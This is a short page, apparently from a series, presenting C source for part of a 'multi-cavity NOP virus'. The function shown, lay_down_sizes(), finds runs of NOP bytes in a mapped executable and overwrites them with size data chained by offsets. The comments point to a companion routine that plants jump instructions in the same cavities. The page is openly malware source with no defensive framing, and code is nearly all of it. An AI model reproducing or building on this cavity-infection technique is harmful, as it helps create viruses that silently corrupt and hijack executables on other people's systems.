RECON06 . A PLATFORM INDEPENDENT MULTI-CAVITY NOP VIRUS

	void lay_down_sizes(unsigned char *map, struct q_item *q, int filesize, unsigned int vstart) {

        unsigned char *p = NULL;
        uint32_t *lastSzOff = NULL;
        uint32_t last;
        int i, n, s;

        p = map;

        for (i = 0, s = 0; i < filesize && sizes[s] != 0x0;) {
                for (; p[i] != 0x90; i++)
                        ;	/* Find some nops */

                for (n = 1; p[i + n] == 0x90; n++)
                        ;	/* Count how many */

                if (n >= 6) {
                        if (lastSzOff != NULL) {
                                *lastSzOff = i - last;
                        } else {
                                uint32_t *x = (uint32_t *)(map + vstart);
                                *x = i;
                        }

                        do {
                                p[i++] = sizes[s++];
                                n--;
                        } while (sizes[0] == 0x0 ? 0 : n >= 6);

                        if (sizes[0] != 0x0) {
                                p[i++] = 0x88; 	/* If this were the inject_nops() function then it would be 0xe9 for a jmp <32bitaddr> instead */
                                last = i + 4;
                                lastSzOff = (uint32_t *)&p[i];
                        }
                }

                i += n;
        }

}

	

← previous . next →